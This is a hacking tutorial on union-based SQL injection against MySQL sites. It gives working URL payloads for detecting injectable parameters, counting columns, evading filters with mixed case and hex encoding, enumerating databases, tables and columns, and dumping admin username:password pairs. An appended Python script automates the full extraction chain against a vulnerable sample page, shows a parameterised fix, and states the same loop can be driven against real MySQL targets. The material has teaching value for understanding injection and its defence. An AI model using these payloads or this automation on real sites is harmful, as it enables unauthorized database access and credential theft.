First thing, this is my tutorial. If you see this tutorial by someone named Orik or Zebra, this is me.
Second, this is a tutorial I made a long time ago, so please excuse my English mistakes.
You need to know SQL before starting this tutorial.
If you don't know SQL, go here and start learning.
SQL Injections.
Chapter 1 – What is SQL Injection?
SQL Injection is when you inject your own SQL into a query that the application is already running against its database.
The database's error messages, and the rows your injected query returns, then leak information about the database and the data in it.
Chapter 2 – Basic SQL Injection
Checking if the Website is vulnerable
First, let's find a target:
Example:
http://website.com/news.php?id=1
You can see that the site above uses a query-string parameter called id.
So the SQL query behind it probably looks something like this:
SELECT * FROM news WHERE id = 1
Now we put an apostrophe (') after id=1:
http://website.com/news.php?id=1'
So now the query looks like this:
SELECT * FROM news WHERE id = 1'
This query will obviously raise an error, because the apostrophe opens a string literal that is never closed.
If you don't see an error, the site probably cannot be SQL injected this way. Keep in mind that many sites hide database errors, so also compare the page for id=1 with the page for id=1': a blank or visibly changed page is a sign as well.
Checking how many columns the query pulls out of the database
The first step of the injection is to find out how many columns the query selects.
Put "group by 1--" after "id=1" (in MySQL, "order by 1--" works the same way).
Then increase the number by 1 until you get an error: GROUP BY n refers to the n-th selected column, so the first n that errors is one more than the column count.
Example:
http://website.com/news.php?id=1 group by 1-- No error
http://website.com/news.php?id=1 group by 2-- No error
http://website.com/news.php?id=1 group by 3-- No error
http://website.com/news.php?id=1 group by 4-- No error
http://website.com/news.php?id=1 group by 5-- Error
That means the query pulls out 4 columns.
Checking which columns are displayed
The query pulls out all the columns, but usually the page displays only a few of them.
So now we will learn how to check which columns are displayed.
To do that we will learn another command: UNION SELECT.
UNION SELECT appends the rows of a second SELECT to the results of the first one. Both SELECTs must return the same number of columns, which is why we counted them first.
Here we do not select data from a table; we supply the values ourselves.
Remember, our goal now is to check which columns are displayed and which are not.
To do that, we use two tricks:
1. We replace the number in the query string "id" with "-1", so the original query returns no rows and only our row is left.
2. We do not add random values; we give each column a consecutive number, so when a number appears on the page we know which column it is.
In this case we found 4 columns, so we write the line below:
http://website.com/news.php?id=-1 union select 1,2,3,4--
As you noticed, we are adding data to each column (only in the result sent to our screen, not in the real table). The columns are separated by commas.
Now all that is left is to check which values we see on the page. It doesn't matter where (title, comment, name), even one number is enough!
Let's assume you see the number 3, so we know the 3rd column is displayed.
You will see why this is useful...
Collecting information on the database
We can collect information on the database in two ways: variables and functions.
Variables: put @@ before the name.
Functions: put () after the name.
*Important*
You can mix capital and lowercase letters.
Sometimes a specific word is blocked by a filter, and mixing the case will get past it.
Example: @@VErSIoN
Version: the first thing you need to know before injecting the site is the database version (it decides, for example, whether information_schema is available, see chapter 3).
There are two ways to find it:
@@version
version()
The database name (most sites have access to more than one database; this returns the one the script is using):
database()
The user the query is running as (these usually return the same result; strictly, user(), system_user() and session_user() return the name the client connected with, and current_user() the account MySQL actually authenticated as):
user()
current_user()
system_user()
session_user()
Data directory (the directory on the server where MySQL stores its database files):
@@datadir
Temporary files directory:
@@tmpdir
Since we found that the 3rd column is displayed on the screen, we write the line below:
http://website.com/news.php?id=-1 union select 1,2,version(),4--
Now, instead of the number 3, we will see the database version.
Summary
In this chapter we learned how to check whether a site can be SQL injected, and how to pull out information about the database.
Chapter 3 – Pulling out information from the database
Introduction
Sites running MySQL version 5 (5.0 and later) have a database named "information_schema".
It holds metadata about all the databases, tables and columns the current user is allowed to see.
Pulling out table names
Usually, the first thing you do once you know you can pull data out of the database is to list all the table names:
http://website.com/news.php?id=-1 union select 1,2,table_name,4 from information_schema.tables where table_schema=database()--
Let's explain the code:
We pulled out the column "table_name" from the table "tables" in the database "information_schema".
As you noticed, to pull data out of another database you write database_name.table_name.
Since we only want the tables of the current database, we added a WHERE condition that keeps only the tables belonging to the database the current script is using.
At the end we put "--" to prevent an error in case the original query has more conditions after our input.
"--" makes everything after it a comment. In MySQL the "--" must be followed by a space (or be the very end of the query); since a trailing space is lost in a URL, write "--+" ("+" decodes to a space) or "-- -".
There are two other ways to mark a comment: "#" (to the end of the line) and "/* ... */".
The command: Limit
In the last part we explained how to pull data out of the table, but the page only shows the name of the first table, because it renders one row.
To display the name of the next table we use the command Limit.
Limit tells the query which rows of the result to return.
It takes two parameters: the row to start from (the offset), and the number of rows to return.
For example, adding Limit 5,10 to the query makes it return 10 rows starting from the 6th row.
Why the 6th row? Because counting starts from 0: offset 1 is the second row (0,1), offset 5 is the sixth row (0,1,2,3,4,5).
Since our page shows only one result (the first table), to pull out table number 6 we write:
http://website.com/news.php?id=-1 union select 1,2,table_name,4 from information_schema.tables where table_schema=database() Limit 5,1--
Note that Limit here applies to the whole UNION result, which is fine because the original SELECT returns no rows for id=-1.
The command: group_concat()
As opposed to Limit, the job of group_concat is to pull out all the rows at once, joined into one string:
http://website.com/news.php?id=-1 union select 1,2,group_concat(table_name, 0x3c62723e),4 from information_schema.tables where table_schema=database()--
Inside the brackets we put the columns we want to pull out, separated by commas; the values of one row are concatenated together.
group_concat joins the rows with a plain comma, which is hard to read on the page, so we added another "field", 0x3c62723e, to put a line break after every result: "3c62723e" is the HEX value of "<br />". (Each row then ends with <br /> followed by MySQL's default comma; the cleaner form is group_concat(table_name SEPARATOR 0x3c62723e).)
Remember: if you want to use a HEX value, put "0x" before it.
Example: 3c62723e = 0x3c62723e.
The disadvantage of group_concat is that by default it returns at most 1024 characters (the group_concat_max_len setting) and truncates the rest. So if there are 100 results, you may only get about 30 of them.
For the rest you fall back to Limit, either one row at a time as above, or by wrapping the table list in a subquery with a Limit and running group_concat over that.
Pulling out column names
OK, so we found the table user/admin with:
http://website.com/news.php?id=-1 union select 1,2,group_concat(table_name, 0x3c62723e),4 from information_schema.tables where table_schema=database()--
So now we want the column names of that table (user/admin):
http://website.com/news.php?id=-1 union select 1,2,group_concat(column_name, 0x3c62723e),4 from information_schema.columns where table_name="admin" and table_schema=database()--
Three things have changed:
1. The name of the column we pull out.
2. The name of the table.
3. The condition.
Notice that we pull out all rows whose table_name column equals the string "admin" (the name of the table we chose).
You need to put the table name in quotes, but sometimes the quotes cause an error (for example because the site escapes them), so we change "admin" to its HEX value instead. The HEX literal replaces the whole quoted string, quotes included, so encode the bare word admin, not "admin" with its quotes: 5c2261646d696e5c22 is the encoding of \"admin\" with escaped quotes and will not match any table.
Just go to GoogleBig – Encoder and Decoder Tool (Base64 – Hex – URL – Binary – Rot13 – Md5 – Sha1 – 1337), or any other hex encoder,
and put admin (without the quotes) in the first textbox.
Then copy the HEX value and put it after table_name= (remember to add "0x" at the beginning of the HEX value).
Example: admin HEX value = 61646d696e:
http://website.com/news.php?id=-1 union select 1,2,group_concat(column_name, 0x3c62723e),4 from information_schema.columns where table_name=0x61646d696e and table_schema=database()--
Pulling out data
OK, so imagine we found that the table admin has the columns username and password.
So now let's pull out the data:
http://website.com/news.php?id=-1 union select 1,2,group_concat(username, 0x3a, password,0x3c62723e),4 from admin--
Now we have pulled out the columns username and password from the table admin.
What do we get?
A list of all the admins' usernames and passwords, each row as username:password followed by <br /> (0x3a is the HEX value of ":").
You can notice that before we wrote database.table, but now, because the table is in the current database, the bare table name is enough.
Pulling out all databases
OK, now here is a line that pulls out the names of all databases:
http://website.com/news.php?id=-1 union select 1,2,group_concat(schema_name, 0x3c62723e),4 from information_schema.schemata--
I think this code is very clear: schema_name in information_schema.schemata holds one row per database.
If you can't understand it, please read this guide one more time until you can.
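As an added, runnable walk-through of chapters 2 and 3 (this is example code written for this page, not part of the original tutorial): a tiny stand-in for the vulnerable news.php that pastes id into its SQL, the probes from the tutorial run against it (apostrophe test, GROUP BY column count, UNION SELECT marker numbers, Limit, group_concat, dumping the admin table), and the fixed page with a bound parameter. SQLite is used as the engine, so the catalog queries use sqlite_master and pragma_table_info instead of information_schema, a quoted '<br />' instead of 0x3c62723e, and sqlite_version() instead of version(); the MySQL forms are noted in comments. The schema, rows and credentials are constructed sample data.

```python
import sqlite3

# Constructed sample database standing in for website.com's backend. SQLite is
# the engine here (an assumption; the tutorial targets MySQL 5, so the catalog
# queries differ and the MySQL forms are noted inline). The injection mechanics
# are identical because the page pastes the untrusted id straight into its SQL.
SCHEMA = """
CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT);
INSERT INTO news VALUES (1, 'Welcome', 'First post', 'editor');
INSERT INTO news VALUES (2, 'Update', 'Second post', 'editor');
CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
INSERT INTO admin VALUES (1, 'root', 's3cret');
INSERT INTO admin VALUES (2, 'alice', 'hunter2');
"""

def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con

def render(row):
    """The page shows only columns 2 and 3 (title | body) of the first row."""
    return "" if row is None else f"{row[1]} | {row[2]}"

def news_page(con, qs_id):
    """Vulnerable news.php: the id from the query string becomes part of the SQL."""
    try:
        return render(con.execute("SELECT * FROM news WHERE id = " + qs_id).fetchone())
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)

def news_page_safe(con, qs_id):
    """Fixed news.php: a bound parameter, so the id is data and never SQL."""
    try:
        return render(con.execute("SELECT * FROM news WHERE id = ?", (qs_id,)).fetchone())
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)

def is_injectable(con):
    """Chapter 2, step 1: a lone apostrophe breaks the query if it reaches the SQL."""
    return news_page(con, "1'").startswith("ERROR")

def count_columns(con, max_cols=20):
    """Step 2: GROUP BY n is the n-th selected column; the first n that errors is
    one past the column count."""
    for n in range(1, max_cols + 1):
        if news_page(con, f"1 group by {n}--").startswith("ERROR"):
            return n - 1
    return None

def displayed_columns(con, ncols):
    """Step 3: id=-1 empties the real result, UNION SELECT 1,...,n adds a row of
    markers, and the markers that appear on the page are the displayed columns."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    page = news_page(con, f"-1 union select {markers}--")
    return [int(tok) for tok in page.split(" | ") if tok.isdigit()]

def extract(con, ncols, shown, expr, tail=""):
    """Chapter 3: put `expr` in a displayed column, markers in the others, and
    read it back from the page. `tail` is the FROM/WHERE/ORDER/LIMIT part."""
    target = shown[-1]
    fields = [expr if i == target else str(i) for i in range(1, ncols + 1)]
    page = news_page(con, f"-1 union select {','.join(fields)} {tail}--")
    return page.split(" | ")[shown.index(target)]

def demo():
    con = connect()
    ncols = count_columns(con)
    shown = displayed_columns(con, ncols)
    return {
        "injectable": is_injectable(con),
        "ncols": ncols,
        "shown": shown,
        "version": extract(con, ncols, shown, "sqlite_version()"),  # MySQL: version()
        # MySQL: group_concat(table_name SEPARATOR 0x3c62723e) from
        # information_schema.tables where table_schema=database()
        "tables": extract(con, ncols, shown, "group_concat(name, '<br />')",
                          "from sqlite_master where type='table'"),
        # Limit walks the list one row at a time. ORDER BY and LIMIT apply to the
        # whole UNION, which is fine because the real SELECT returns no rows.
        "second_table": extract(con, ncols, shown, "name",
                                "from sqlite_master where type='table' order by 3 limit 1,1"),
        # MySQL: column_name from information_schema.columns where table_name=0x61646d696e
        "admin_columns": extract(con, ncols, shown, "group_concat(name, ',')",
                                 "from pragma_table_info('admin')"),
        # MySQL: group_concat(username, 0x3a, password, 0x3c62723e) from admin
        "creds": extract(con, ncols, shown,
                         "group_concat(username || ':' || password, '<br />')", "from admin"),
        # Against the fixed page the probe and the UNION are just an id that matches nothing.
        "safe_normal": news_page_safe(con, "1"),
        "safe_probe": news_page_safe(con, "1'"),
        "safe_union": news_page_safe(con, "-1 union select 1,2,3,4--"),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it and compare the two pages: the concatenating version hands over the engine version, the table list, the admin columns and every username:password pair through a single displayed column, while the parameterised version treats 1' and the whole UNION payload as an id value that simply matches no row. The same extract() loop is what you would drive against a real MySQL target, only with the payload tails swapped for the information_schema queries shown in this chapter.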
MySQL database Version 4
MySQL version 4 databases do not have the information_schema database.
So you will have to guess the table and column names. And that sucks...